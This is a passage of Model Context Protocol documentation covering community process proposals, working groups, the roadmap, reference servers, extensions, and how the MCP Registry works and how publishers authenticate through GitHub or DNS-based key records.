* [MCP Specification - Authorization](https://modelcontextprotocol.org/docs/spec/authorization)
* [Evolving OAuth Client Registration in the Model Context Protocol](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1027/)
# SEP-994: Shared Communication Practices/Guidelines
Source: https://modelcontextprotocol.io/community/seps/994-shared-communication-practicesguidelines
Shared Communication Practices/Guidelines
Final
Process
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 994 |
| **Title** | Shared Communication Practices/Guidelines |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-07-17 |
| **Author(s)** | [@localden](https://github.com/localden) |
| **Sponsor** | None |
| **PR** | [#1002](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1002) |
***
## Abstract
This SEP establishes the communication strategy and framework for the Model Context Protocol community. It defines the official channels for contributor communication, guidelines for their use, and processes for decision documentation.
## Motivation
As the MCP community grows, clear communication guidelines are essential for:
* **Consistency**: Ensuring all contributors know where and how to communicate
* **Transparency**: Making project decisions visible and accessible
* **Efficiency**: Directing discussions to the most appropriate channels
* **Security**: Establishing proper processes for handling sensitive issues
## Specification
### Communication Channels
The MCP project uses three primary communication channels:
1. **Discord**: For real-time or ad-hoc discussions among contributors
2. **GitHub Discussions**: For structured, longer-form discussions
3. **GitHub Issues**: For actionable tasks, bug reports, and feature requests
Security-sensitive issues follow a separate process defined in SECURITY.md.
### Discord Guidelines
The Discord server is designed for **MCP contributors** and is not intended for general MCP support.
#### Public Channels (Default)
* Open community engagement and collaborative development
* SDK and tooling development discussions
* Working and Interest Group discussions
* Community onboarding and contribution guidance
* Office hours and maintainer availability
#### Private Channels (Exceptions)
Private channels are reserved for:
* Security incidents (CVEs, protocol vulnerabilities)
* People matters (maintainer discussions, code of conduct)
* Coordination requiring immediate focused response
All technical and governance decisions must be documented publicly in GitHub.
### GitHub Discussions
Used for structured, long-form discussion:
* Project roadmap planning
* Announcements and release communications
* Community polls and consensus-building
* Feature requests with context and rationale
### GitHub Issues
Used for actionable items:
* Bug reports with reproducible steps
* Documentation improvements
* CI/CD and infrastructure issues
* Release tasks and milestone tracking
### Decision Records
All MCP decisions are documented publicly:
* **Technical decisions**: GitHub Issues and SEPs
* **Specification changes**: Changelog on the MCP website
* **Process changes**: Community documentation
* **Governance decisions**: GitHub Issues and SEPs
Decision documentation includes:
* Decision makers
* Background context and motivation
* Options considered
* Rationale for chosen approach
* Implementation steps
## Rationale
This framework balances openness with practicality:
* **Public by default**: Maximizes transparency and community participation
* **Private when necessary**: Protects security and personal matters
* **Channel separation**: Keeps discussions organized and searchable
* **Documentation requirements**: Ensures decisions are preserved and discoverable
## Backward Compatibility
This SEP establishes new processes and does not affect existing protocol functionality.
## Reference Implementation
The communication guidelines are published at: [https://modelcontextprotocol.io/community/communication](https://modelcontextprotocol.io/community/communication)
# Specification Enhancement Proposals (SEPs)
Source: https://modelcontextprotocol.io/community/seps/index
Index of all MCP Specification Enhancement Proposals
Specification Enhancement Proposals (SEPs) are the primary mechanism for proposing major changes to the Model Context Protocol. Each SEP provides a concise technical specification and rationale for proposed features.
Learn how to submit your own Specification Enhancement Proposal
## Summary
* **Final**: 24
## All SEPs
| SEP | Title | Status | Type | Created |
| ----------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | -------------------- | ---------------- | ---------- |
| [SEP-2133](/community/seps/2133-extensions) | Extensions | Final | Standards Track | 2025-01-21 |
| [SEP-2085](/community/seps/2085-governance-succession-and-amendment) | Governance Succession and Amendment Procedures | Final | Process | 2025-12-05 |
| [SEP-1865](/community/seps/1865-mcp-apps-interactive-user-interfaces-for-mcp) | MCP Apps - Interactive User Interfaces for MCP | Final | Extensions Track | 2025-11-21 |
| [SEP-1850](/community/seps/1850-pr-based-sep-workflow) | PR-Based SEP Workflow | Final | Process | 2025-11-20 |
| [SEP-1730](/community/seps/1730-sdks-tiering-system) | SDKs Tiering System | Final | Standards Track | 2025-10-29 |
| [SEP-1699](/community/seps/1699-support-sse-polling-via-server-side-disconnect) | Support SSE polling via server-side disconnect | Final | Standards Track | 2025-10-22 |
| [SEP-1686](/community/seps/1686-tasks) | Tasks | Final | Standards Track | 2025-10-20 |
| [SEP-1613](/community/seps/1613-establish-json-schema-2020-12-as-default-dialect-f) | Establish JSON Schema 2020-12 as Default Dialect for MCP | Final | Standards Track | 2025-10-06 |
| [SEP-1577](/community/seps/1577--sampling-with-tools) | Sampling With Tools | Final | Standards Track | 2025-09-30 |
| [SEP-1330](/community/seps/1330-elicitation-enum-schema-improvements-and-standards) | Elicitation Enum Schema Improvements and Standards Compliance | Final | Standards Track | 2025-08-11 |
| [SEP-1319](/community/seps/1319-decouple-request-payload-from-rpc-methods-definiti) | Decouple Request Payload from RPC Methods Definition | Final | Standards Track | 2025-08-08 |
| [SEP-1303](/community/seps/1303-input-validation-errors-as-tool-execution-errors) | Input Validation Errors as Tool Execution Errors | Final | Standards Track | 2025-08-05 |
| [SEP-1302](/community/seps/1302-formalize-working-groups-and-interest-groups-in-mc) | Formalize Working Groups and Interest Groups in MCP Governance | Final | Standards Track | 2025-08-05 |
| [SEP-1046](/community/seps/1046-support-oauth-client-credentials-flow-in-authoriza) | Support OAuth client credentials flow in authorization | Final | Standards Track | 2025-07-23 |
| [SEP-1036](/community/seps/1036-url-mode-elicitation-for-secure-out-of-band-intera) | URL Mode Elicitation for secure out-of-band interactions | Final | Standards Track | 2025-07-22 |
| [SEP-1034](/community/seps/1034--support-default-values-for-all-primitive-types-in) | Support default values for all primitive types in elicitation schemas | Final | Standards Track | 2025-07-22 |
| [SEP-1024](/community/seps/1024-mcp-client-security-requirements-for-local-server-) | MCP Client Security Requirements for Local Server Installation | Final | Standards Track | 2025-07-22 |
| [SEP-994](/community/seps/994-shared-communication-practicesguidelines) | Shared Communication Practices/Guidelines | Final | Process | 2025-07-17 |
| [SEP-991](/community/seps/991-enable-url-based-client-registration-using-oauth-c) | Enable URL-based Client Registration using OAuth Client ID Metadata Documents | Final | Standards Track | 2025-07-07 |
| [SEP-990](/community/seps/990-enable-enterprise-idp-policy-controls-during-mcp-o) | Enable enterprise IdP policy controls during MCP OAuth flows | Final | Standards Track | 2025-06-04 |
| [SEP-986](/community/seps/986-specify-format-for-tool-names) | Specify Format for Tool Names | Final | Standards Track | 2025-07-16 |
| [SEP-985](/community/seps/985-align-oauth-20-protected-resource-metadata-with-rf) | Align OAuth 2.0 Protected Resource Metadata with RFC 9728 | Final | Standards Track | 2025-07-16 |
| [SEP-973](/community/seps/973-expose-additional-metadata-for-implementations-res) | Expose additional metadata for Implementations, Resources, Tools and Prompts | Final | Standards Track | 2025-07-15 |
| [SEP-932](/community/seps/932-model-context-protocol-governance) | Model Context Protocol Governance | Final | Process | 2025-07-08 |
## SEP Status Definitions
| Status | Definition |
| ------------------------- | -------------------------------------------------------- |
| Draft | SEP proposal with a sponsor, undergoing informal review |
| In-Review | SEP proposal ready for formal review by Core Maintainers |
| Accepted | SEP accepted, awaiting reference implementation |
| Final | SEP finalized with reference implementation complete |
| Rejected | SEP rejected by Core Maintainers |
| Withdrawn | SEP withdrawn by the author |
| Superseded | SEP replaced by a newer SEP |
| Dormant | SEP without a sponsor, closed after 6 months |
# Working and Interest Groups
Source: https://modelcontextprotocol.io/community/working-interest-groups
Learn about the two forms of collaborative groups within the Model Context Protocol's governance structure - Working Groups and Interest Groups.
Within the MCP contributor community we maintain two types of collaboration formats: **Interest Groups (IGs)** and **Working Groups (WGs)**.
## Quick Reference
| | Interest Group (IG) | Working Group (WG) |
| -------------- | -------------------------------------------------- | ------------------------------------------------------ |
| **Purpose** | Identify and discuss problems | Build concrete solutions |
| **Output** | Problem statements, use cases, recommendations | SEPs, implementations, code |
| **Commitment** | Casual participation welcome | Active contribution expected |
| **Duration** | Ongoing as long as topic is relevant | Until deliverables complete |
| **Example** | "Security in MCP" - discussing security challenges | "Server Identity" - implementing identity verification |
## When to Use Which
**Join an Interest Group when you:**
* Have a problem but aren't sure of the solution
* Want to explore whether an idea has community support
* Are new to MCP and want to learn about a topic area
* Want to share use cases and requirements
**Join a Working Group when you:**
* Have a specific solution to implement
* Are ready to write code or a SEP
* Can commit regular time to active development
* Want to help build a particular feature
**Typical flow**: Discuss a problem in an IG → Validate that it's worth solving → Form or join a WG to build the solution → Submit a SEP → Implement
## Interest Groups (IGs)
**Goal:** Facilitate discussion and knowledge-sharing among MCP contributors who share interests in a specific topic. The focus is on identifying problems worth solving and gathering requirements.
### What IGs Do
* Host discussions in Discord channels
* Run regular meetings to share use cases
* Document problem statements and requirements
* Build consensus on what should be prioritized
* Provide input to Working Groups and SEPs
### Expectations
* Regular conversations in the IG's Discord channel
* **AND/OR** recurring live meetings attended by IG members
* Meeting dates published on the [MCP community calendar](https://meet.modelcontextprotocol.io/) with the IG channel name (e.g., `auth-ig`)
* Notes publicly shared after meetings as a [GitHub issue](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1629) or public Google Doc
### Examples of Interest Groups
* Security in MCP
* Auth in MCP
* Using MCP in enterprise settings
* Tooling and practices for hosting MCP servers
* Tooling and practices for implementing MCP clients
### Creating an Interest Group
1. Fill out the creation template in the `#wg-ig-group-creation` channel on [Discord](https://discord.gg/6CSzBmMkjX)
2. A community moderator will review and call for a vote in `#community-moderators` (72h period, majority approval)
3. Once approved, the Facilitator(s) organize the IG per the expectations above
**Creation Template:**
* Facilitator(s)
* Maintainer(s) (optional - an official MCP Steering Group representative)
* Related IGs with potentially similar goals
* How this IG differentiates itself from related IGs
* First topic to discuss within the IG
### IG Lifecycle
* **No time limit** - Successful IGs remain active as long as they're maintained
* **Retirement** - Community moderators or Core/Lead Maintainers may retire an IG that's no longer active or needed
## Working Groups (WGs)
**Goal:** Collaborate on a SEP, a series of related SEPs, or an officially endorsed project. WGs produce concrete deliverables.
### What WGs Do
* Write and iterate on SEPs
* Build reference implementations
* Maintain ongoing projects (Inspector, Registry, SDKs)
* Drive features from proposal to specification
### Expectations
* Meaningful progress towards at least one SEP or implementation **OR** maintenance responsibilities for a project
* Facilitators keep track of progress and communicate status
* Meeting dates published on the [MCP community calendar](https://meet.modelcontextprotocol.io/) with the WG channel name (e.g., `agents-wg`)
* Notes publicly shared after meetings
### Examples of Working Groups
* Registry
* Inspector
* Tool Filtering
* Server Identity
### Creating a Working Group
1. Fill out the creation template in `#wg-ig-group-creation` on [Discord](https://discord.gg/6CSzBmMkjX)
2. Community moderator reviews and calls for vote (72h period, majority approval)
3. Facilitator(s) organize the WG per expectations
**Creation Template:**
* Facilitator(s)
* Maintainer(s) (optional)
* Explanation of interest/use cases (IG discussion helps but isn't required)
* First Issue/PR/SEP the WG will work on
### WG Lifecycle
* **Active** - WG has ongoing work and regular participation
* **Retirement** - WG is retired when:
* Community moderators or Core/Lead Maintainers determine it's no longer active
* The WG has no active Issue/PR for a month or has completed all planned work
## Facilitators
A **Facilitator** is an informal role anyone can self-nominate for. Facilitators:
* Shepherd discussions and collaboration
* Schedule and run meetings
* Ensure notes are published
* Keep the group on track
Being a Facilitator does **not** grant [maintainership](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) in the MCP organization. Lead and Core Maintainers may modify the list of Facilitators for any WG/IG at any time.
## Meeting Calendar
All IG and WG meetings are published on the public MCP community calendar at [meet.modelcontextprotocol.io](https://meet.modelcontextprotocol.io/).
Facilitators are responsible for posting meeting schedules in advance to enable broader participation.
## FAQ
### How do I get involved contributing to MCP?
These groups provide an on-ramp:
1. [Join Discord](https://discord.gg/6CSzBmMkjX) and follow IGs relevant to you. Attend [live calls](https://meet.modelcontextprotocol.io/). Participate in discussions.
2. Offer to facilitate calls. Share your use cases in SEP discussions.
3. When ready for hands-on work, contribute to WG deliverables.
4. Active contributors may be nominated by WG maintainers as new maintainers.
### Where can I find a list of all current WGs and IGs?
On the [MCP Contributor Discord](https://discord.gg/6CSzBmMkjX), there is a section of channels for each Working and Interest Group.
### Do I need to join an IG before starting a WG?
No. IG participation can help validate ideas and build support, but it's not required. You can start a WG directly if you have a clear deliverable in mind.
### Do I need to be in a WG to submit a SEP?
No. Anyone can submit a SEP. However, WG collaboration can strengthen your proposal and increase its chances of success.
### What if my IG discussion leads to a concrete solution?
Great! You can either:
* Form a new WG to build the solution
* Join an existing WG if one covers the area
* Submit a SEP directly if the solution is well-defined
### Can one person be in multiple IGs/WGs?
Yes. Participate in as many groups as your time allows.
# Roadmap
Source: https://modelcontextprotocol.io/development/roadmap
Our plans for evolving Model Context Protocol
Last updated: **2025-10-31**
The Model Context Protocol is rapidly evolving. This page outlines our priorities for **the next release on November 25th, 2025**, with a release candidate available on November 11th, 2025. To see what's changing in the upcoming release, check out the **[specification changelog](/specification/draft/changelog/)**.
For more context on our release timeline and governance process, read our [blog post on the next version update](https://blog.modelcontextprotocol.io/posts/2025-09-26-mcp-next-version-update/).
The ideas presented here are not commitments—we may solve these challenges differently than described, or some may not materialize at all. This is also not an *exhaustive* list; we may incorporate work that isn't mentioned here.
We value community participation! Each section links to relevant discussions where you can learn more and contribute your thoughts.
For a technical view of our standardization process, visit the [Standards Track](https://github.com/orgs/modelcontextprotocol/projects/2/views/2) on GitHub, which tracks how proposals progress toward inclusion in the official [MCP specification](https://modelcontextprotocol.io/specification/).
## Priority Areas for the Next Release
### Asynchronous Operations
Currently, MCP is built around mostly synchronous operations. We're adding async support to allow servers to kick off long-running tasks while clients can check back later for results. This will enable operations that take minutes or hours without blocking.
Follow the progress in [SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686).
### Statelessness and Scalability
As organizations deploy MCP servers at enterprise scale, we're addressing challenges around horizontal scaling. While [Streamable HTTP](https://modelcontextprotocol.io/specification/2025-03-26/basic/transports#streamable-http) provides some stateless support, we're smoothing out rough edges around server startup and session handling to make it easier to run MCP servers in production.
The current focus point for this effort is [SEP-1442](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1442).
### Server Identity
We're enabling servers to advertise themselves through [`.well-known` URLs](https://en.wikipedia.org/wiki/Well-known_URI)—an established standard for providing metadata. This will allow clients to discover what a server can do without having to connect to it first, making discovery much more intuitive and enabling systems like our registry to automatically catalog capabilities. We are working closely across multiple projects in the industry to rely on a common standard on agent cards.
### Official Extensions
As MCP has grown, valuable patterns have emerged for specific industries and use cases. Rather than leaving everyone to reinvent the wheel, we're officially recognizing and documenting the most popular protocol extensions. This curated collection will give developers building for specialized domains like healthcare, finance, or education a solid starting point.
### SDK Support Standardization
We're introducing a clear tiering system for SDKs based on factors like specification compliance speed, maintenance responsiveness, and feature completeness. This will help developers understand exactly what level of support they're getting before committing to a dependency.
### MCP Registry General Availability
The [MCP Registry](https://github.com/modelcontextprotocol/registry) launched in preview in September 2025 and is progressing toward general availability. We're stabilizing the v0.1 API through real-world integrations and community feedback, with plans to transition from preview to a production-ready service. This will provide developers with a reliable, community-driven platform for discovering and sharing MCP servers.
## Validation
To foster a robust developer ecosystem, we plan to invest in:
* **Reference Client Implementations**: demonstrating protocol features with high-quality AI applications
* **Reference Server Implementation**: showcasing authentication patterns and remote deployment best practices
* **Compliance Test Suites**: automated verification that clients, servers, and SDKs properly implement the specification
These tools will help developers confidently implement MCP while ensuring consistent behavior across the ecosystem.
## Get Involved
We welcome your contributions to MCP's future! Join our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to share ideas, provide feedback, or participate in the development process.
# Example Servers
Source: https://modelcontextprotocol.io/examples
A list of example servers and implementations
This page showcases various Model Context Protocol (MCP) servers that demonstrate the protocol's capabilities and versatility. These servers enable Large Language Models (LLMs) to securely access tools and data sources.
## Reference implementations
These official reference servers demonstrate core MCP features and SDK usage:
### Current reference servers
* **[Everything](https://github.com/modelcontextprotocol/servers/tree/main/src/everything)** - Reference / test server with prompts, resources, and tools
* **[Fetch](https://github.com/modelcontextprotocol/servers/tree/main/src/fetch)** - Web content fetching and conversion for efficient LLM usage
* **[Filesystem](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem)** - Secure file operations with configurable access controls
* **[Git](https://github.com/modelcontextprotocol/servers/tree/main/src/git)** - Tools to read, search, and manipulate Git repositories
* **[Memory](https://github.com/modelcontextprotocol/servers/tree/main/src/memory)** - Knowledge graph-based persistent memory system
* **[Sequential Thinking](https://github.com/modelcontextprotocol/servers/tree/main/src/sequentialthinking)** - Dynamic and reflective problem-solving through thought sequences
* **[Time](https://github.com/modelcontextprotocol/servers/tree/main/src/time)** - Time and timezone conversion capabilities
### Additional example servers (archived)
Visit the [servers-archived repository](https://github.com/modelcontextprotocol/servers-archived) to get access to archived example servers that are no longer actively maintained.
They are provided for historical reference only.
## Official integrations
Visit the [MCP Servers Repository (Official Integrations section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#%EF%B8%8F-official-integrations) for a list of MCP servers maintained by companies for their platforms.
## Community implementations
Visit the [MCP Servers Repository (Community section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-community-servers) for a list of MCP servers maintained by community members.
## Getting started
### Using reference servers
TypeScript-based servers can be used directly with `npx`:
```bash theme={null}
npx -y @modelcontextprotocol/server-memory
```
Python-based servers can be used with `uvx` (recommended) or `pip`:
```bash theme={null}
# Using uvx
uvx mcp-server-git
# Using pip
pip install mcp-server-git
python -m mcp_server_git
```
### Configuring with Claude
To use an MCP server with Claude, add it to your configuration:
```json theme={null}
{
"mcpServers": {
"memory": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-memory"]
},
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/path/to/allowed/files"
]
},
"github": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-github"],
"env": {
"GITHUB_PERSONAL_ACCESS_TOKEN": ""
}
}
}
}
```
## Additional resources
Visit the [MCP Servers Repository (Resources section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-resources) for a collection of other resources and projects related to MCP.
Visit our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to engage with the MCP community.
# Extensions
Source: https://modelcontextprotocol.io/extensions
Optional extensions to the Model Context Protocol
# MCP Extensions
MCP extensions are optional additions to the specification that define capabilities beyond the core protocol. Extensions enable functionality that may be modular (e.g., distinct features like authentication), specialized (e.g., industry-specific logic), or experimental (e.g., features being incubated for potential core inclusion).
Extensions are identified using a unique *extension identifier* with the format: `{vendor-prefix}/{extension-name}`, e.g. `io.modelcontextprotocol/oauth-client-credentials`. Official extensions use the `io.modelcontextprotocol` vendor prefix.
## Official Extension Repositories
Official extensions live inside the [MCP GitHub org](https://github.com/modelcontextprotocol/) in repositories with the `ext-` prefix.
### ext-auth
**Repository:** [github.com/modelcontextprotocol/ext-auth](https://github.com/modelcontextprotocol/ext-auth)
Extensions for supplementary authorization mechanisms beyond the core specification.
| Extension | Description | Specification |
| -------------------------------- | -------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------- |
| OAuth Client Credentials | OAuth 2.0 client credentials flow for machine-to-machine authentication | [Link](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx) |
| Enterprise-Managed Authorization | Framework for enterprise environments requiring centralized access control | [Link](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/enterprise-managed-authorization.mdx) |
### ext-apps
**Repository:** [github.com/modelcontextprotocol/ext-apps](https://github.com/modelcontextprotocol/ext-apps)
Extensions for interactive UI elements in conversational MCP clients.
| Extension | Description | Specification |
| --------- | ---------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- |
| MCP Apps | Allows MCP Servers to display interactive UI elements (charts, forms, video players) inline within conversations | [Link](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/2026-01-26/apps.mdx) |
## Creating Extensions
The lifecycle for official extensions is similar to a SEP, but delegated to extension repository maintainers:
1. **Propose**: Author creates a SEP in the main MCP repository using the [standard SEP guidelines](/community/sep-guidelines) with type **Extensions Track**.
2. **Review**: Extension SEPs are reviewed by the relevant extension repository maintainers.
3. **Implement**: Extension SEPs **MUST** have at least one reference implementation in an official SDK before being accepted.
4. **Publish**: Once approved, the author produces a PR that introduces the extension to the extension repository.
5. **Adopt**: Approved extensions **MAY** be implemented in additional clients, servers, and SDKs.
### Requirements
* Extension specifications **MUST** use RFC 2119 language (MUST, SHOULD, MAY)
* Extensions **SHOULD** have an associated working group or interest group
### SDK Implementation
SDKs **MAY** implement extensions. Where implemented:
* Extensions **MUST** be disabled by default and require explicit opt-in
* SDK documentation **SHOULD** list supported extensions
* SDK maintainers have full autonomy over which extensions they support
* Extension support is not required for protocol conformance
### Evolution
Extensions evolve independently of the core protocol. Updates to extensions are managed by the extension repository maintainers and do not require core maintainer review.
Extensions **MUST** consider backwards compatibility in their design:
* Extensions **SHOULD** maintain backwards compatibility through capability flags or versioning within the extension settings object, rather than creating a new extension identifier
* When backwards-incompatible changes are unavoidable, a new extension identifier **MUST** be used (e.g., `io.modelcontextprotocol/my-extension-v2`)
# The MCP Registry
Source: https://modelcontextprotocol.io/registry/about
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
The MCP Registry is the official centralized metadata repository for publicly accessible MCP servers, backed by major trusted contributors to the MCP ecosystem such as Anthropic, GitHub, PulseMCP, and Microsoft.
The MCP Registry provides:
* A single place for server creators to publish metadata about their servers
* Namespace management through DNS verification
* A REST API for MCP clients and aggregators to discover available servers
* Standardized installation and configuration information
Server metadata is stored in a standardized [`server.json` format](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/server-json/server.schema.json), which contains:
* The server's unique name (e.g., `io.github.user/server-name`)
* Where to locate the server (e.g., npm package name, remote server URL)
* Execution instructions (e.g., command-line args, env vars)
* Other discovery data (e.g., description, server capabilities)
## The MCP Registry Ecosystem
The MCP Registry is part of an ecosystem that looks something like:
### Relationship with Package Registries
Package registries — such as npm, PyPI, and Docker Hub — host packages with code and binaries.
The MCP Registry hosts metadata that points to those packages.
For example, a `weather-mcp` package could be hosted on npm, and metadata in the MCP Registry could map the "weather v1.2.0" server to `npm:weather-mcp`.
The [Package Types guide](./package-types.mdx) lists the supported package types and registries. More package registries may be supported in the future based on community demand. If you are interested in building support for a package registry, please [open an issue](https://github.com/modelcontextprotocol/registry).
### Relationship with Server Developers
The MCP Registry supports both open-source and closed-source servers. Server developers can publish their server's metadata to the registry as long as the server's installation method is publicly available (e.g., an npm package or a Docker image on a public registry) *or* the server itself is publicly accessible (e.g., a remote server that is not restricted to private networks).
The MCP Registry **does not** support private servers. Private servers are those that are only accessible to a narrow set of users. For example, servers published on a private network (like `mcp.acme-corp.internal`) or on private package registries (e.g. `npx -y @acme/mcp --registry https://artifactory.acme-corp.internal/npm`). If you want to publish private servers, we recommend that you host your own private MCP registry and add them there.
### Relationship with Downstream Aggregators
The MCP Registry is intended to be consumed primarily by downstream aggregators, such as MCP server marketplaces.
The metadata hosted by the MCP Registry is deliberately unopinionated. Downstream aggregators can provide curation or additional metadata such as community ratings.
We expect that downstream aggregators will use the MCP Registry API to pull new metadata on a regular but infrequent basis (for example, once per hour). See the [MCP Registry Aggregators guide](./registry-aggregators.mdx) for more information.
### Relationship with Other MCP Registries
In addition to a public REST API, the MCP Registry defines an [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) that other MCP registries can implement in order to provide a standardized interface for MCP host applications.
We expect that many downstream aggregators will implement this interface. Private MCP registries can implement it as well to benefit from existing host application support.
Note that the official MCP Registry codebase is **not** designed for self-hosting, and the registry maintainers cannot provide support for this use case. If you choose to fork it, you would need to maintain and operate it independently.
### Relationship with MCP Host Applications
The MCP Registry is not intended to be directly consumed by host applications. Instead, host applications should consume other MCP registries, such as downstream marketplaces, via a REST API conforming to the official MCP Registry's OpenAPI spec.
## Trust and Security
### Verifying Server Authenticity
The MCP Registry uses namespace authentication to ensure that servers come from their claimed sources. Server names follow a reverse DNS format (like `io.github.username/server` or `com.example/server`) that ties them to verified GitHub accounts or domains.
This namespace system ensures that only the legitimate owner of a GitHub account or domain can publish servers under that namespace, providing trust and accountability in the ecosystem. For details on authentication methods, see the [Authentication guide](./authentication.mdx).
### Security Scanning
The MCP Registry delegates security scanning to:
* **Underlying package registries** — npm, PyPI, Docker Hub, and other package registries perform their own security scanning and vulnerability detection.
* **Downstream aggregators** — MCP Registry aggregators and marketplaces can implement additional security checks, ratings, or curation.
The MCP Registry focuses on namespace authentication and metadata hosting, while relying on the broader ecosystem for security scanning of actual server code.
### Spam Prevention
The MCP Registry uses multiple mechanisms to prevent spam:
* **Namespace authentication requirements** — Publishers must verify ownership of their namespace through GitHub, DNS, or HTTP challenges, preventing arbitrary spam submissions.
* **Character limits and validation** — Free-form fields have strict character limits and regex validation to prevent abuse.
* **Manual takedown** — The registry maintainers can manually remove spam or malicious servers. See the [Moderation Policy](./moderation-policy.mdx) for details on what content is removed.
Future spam prevention measures under consideration include stricter rate limiting, AI-based spam detection, and community reporting capabilities.
# How to Authenticate When Publishing to the Official MCP Registry
Source: https://modelcontextprotocol.io/registry/authentication
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
You must authenticate before publishing to the official MCP Registry. The MCP Registry supports different authentication methods. Which authentication method you choose determines the namespace of your server's name.
If you choose GitHub-based authentication, your server's name in `server.json` **MUST** be of the form `io.github.username/*` (or `io.github.orgname/*`). For example, `io.github.alice/weather-server`.
If you choose domain-based authentication, your server's name in `server.json` **MUST** be of the form `com.example.*/*`, where `com.example` is the reverse-DNS form of your domain name. For example, `io.modelcontextprotocol/everything`.
| Authentication | Name Format | Example Name |
| -------------- | ----------------------------------------------- | ------------------------------------ |
| GitHub-based | `io.github.username/*` or `io.github.orgname/*` | `io.github.alice/weather-server` |
| domain-based | `com.example.*/*` | `io.modelcontextprotocol/everything` |
## GitHub Authentication
GitHub authentication uses an OAuth flow initiated by the `mcp-publisher` CLI tool.
To perform GitHub authentication, navigate to your server project directory and run:
```bash theme={null}
mcp-publisher login github
```
You should see output like:
```text Output theme={null}
Logging in with github...
To authenticate, please:
1. Go to: https://github.com/login/device
2. Enter code: ABCD-1234
3. Authorize this application
Waiting for authorization...
```
Visit the link, follow the prompts, and enter the authorization code that was printed in the terminal (e.g., `ABCD-1234` in the above output). Once complete, go back to the terminal, and you should see output like:
```text Output theme={null}
Successfully authenticated!
✓ Successfully logged in
```
## DNS Authentication
DNS authentication is a domain-based authentication method that relies on a DNS TXT record.
To perform DNS authentication using the `mcp-publisher` CLI tool, run the following commands in your server project directory to generate a TXT record based on a public/private key pair:
```bash Ed25519 theme={null}
MY_DOMAIN="example.com"
# Generate public/private key pair using Ed25519
openssl genpkey -algorithm Ed25519 -out key.pem
# Generate TXT record
PUBLIC_KEY="$(openssl pkey -in key.pem -pubout -outform DER | tail -c 32 | base64)"
echo "${MY_DOMAIN}. IN TXT \"v=MCPv1; k=ed25519; p=${PUBLIC_KEY}\""
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
# Generate public/private key pair using ECDSA P-384
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:secp384r1 -out key.pem
# Generate TXT record
PUBLIC_KEY="$(openssl ec -in key.pem -text -noout -conv_form compressed | grep -A4 "pub:" | tail -n +2 | tr -d ' :\n' | xxd -r -p | base64)"
echo "${MY_DOMAIN}. IN TXT \"v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}\""
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
# Log in using gcloud CLI (https://cloud.google.com/sdk/docs/install)
gcloud auth login
# Set default project
gcloud config set project "${MY_PROJECT}"
# Create a keyring in your project
gcloud kms keyrings create "${MY_KEYRING}" --location global
# Create an Ed25519 signing key
gcloud kms keys create "${MY_KEY_NAME}" --default-algorithm=ec-sign-ed25519 --purpose=asymmetric-signing --keyring="${MY_KEYRING}" --location=global
# Enable Application Default Credentials (ADC) so the publisher tool can sign
gcloud auth application-default login
# Attempt login to show the public key
mcp-publisher login dns google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
# Copy the "Expected proof record":
# ${MY_DOMAIN}. IN TXT "v=MCPv1; k=ed25519; p=${PUBLIC_KEY}"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_SUBSCRIPTION="subscription name or ID"
MY_RESOURCE_GROUP="MyResourceGroup"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
# Log in using Azure CLI (https://learn.microsoft.com/en-us/cli/azure/install-azure-cli)
az login
# Set default subscription
az account set --subscription "${MY_SUBSCRIPTION}"
# Create a resource group
az group create --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create a key vault
az keyvault create --name "${MY_KEY_VAULT}" --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create an ECDSA P-384 signing key
az keyvault key create --name "${MY_KEY_NAME}" --vault-name "${MY_KEY_VAULT}" --curve P-384
# Attempt login to show the public key
mcp-publisher login dns azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
# Copy the "Expected proof record":
# ${MY_DOMAIN}. IN TXT "v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}"
```
Then add the TXT record using your DNS provider's control panel. It may take several minutes for the TXT record to propagate. After the TXT record has propagated, log in using the `mcp-publisher login` command:
```bash Ed25519 theme={null}
